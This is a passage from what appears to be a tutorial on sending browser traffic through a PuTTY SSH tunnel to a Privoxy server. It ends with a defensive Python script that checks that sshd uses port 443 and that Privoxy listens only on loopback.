    • HTTP Proxy : 127.0.0.1
    • Port : 8118
    • SOCKS v5
  10. Save this configuration and you are done.

Now all your web traffic is routed through the proxy server along the path configured in Putty; here Putty is configured to forward all your web traffic through port 8118 to the server you are connecting to.

The thumb drive is used here for mobility and is optional. Those who want to configure this on their own system can repeat the same steps with their favorite browser, such as Opera or Internet Explorer.
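
The setup above depends on two server-side settings: sshd answering on port 443, and Privoxy listening on port 8118 on the loopback address so that it can only be reached through the SSH tunnel. The Python audit below is an added example, not part of the original post; the function names and the sample config strings are constructed for illustration.

```python
import ipaddress


def directives(text):
    """Yield (keyword, value) pairs, skipping comments and blank lines."""
    for raw in text.splitlines():
        parts = raw.split("#", 1)[0].split(None, 1)
        if parts:
            yield parts[0].lower(), parts[1].strip() if len(parts) > 1 else ""


def is_loopback(host):
    host = host.strip("[]")
    if host.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # empty or unresolved hosts are treated as exposed


def audit(sshd_text, privoxy_text, ssh_port="443", proxy_port="8118"):
    """Compare both configs with the page's setup and return findings."""
    findings = []
    # sshd falls back to port 22 when no Port line is present.
    ports = [v for k, v in directives(sshd_text) if k == "port"] or ["22"]
    if ssh_port not in ports:
        findings.append(f"sshd listens on {', '.join(ports)}, not {ssh_port}")
    # Privoxy falls back to 127.0.0.1:8118 when listen-address is absent.
    listens = [v for k, v in directives(privoxy_text)
               if k == "listen-address"] or ["127.0.0.1:8118"]
    for addr in listens:
        host, _, port = addr.rpartition(":")
        if port != proxy_port:
            findings.append(f"Privoxy port is {port}, tunnel expects {proxy_port}")
        if not is_loopback(host):
            findings.append(f"Privoxy listens on '{addr}', reachable without SSH")
    return findings


# Constructed sample configs (not taken from the original post).
GOOD_SSHD, GOOD_PRIVOXY = "Port 443\n", "listen-address  127.0.0.1:8118\n"
BAD_SSHD, BAD_PRIVOXY = "#Port 443\nPort 22\n", "listen-address :8118\n"

if __name__ == "__main__":
    for finding in audit(BAD_SSHD, BAD_PRIVOXY):
        print("FINDING:", finding)
```

A listen-address with no host part binds Privoxy to every interface, which turns the server into a proxy that anyone on the network can use without authenticating over SSH.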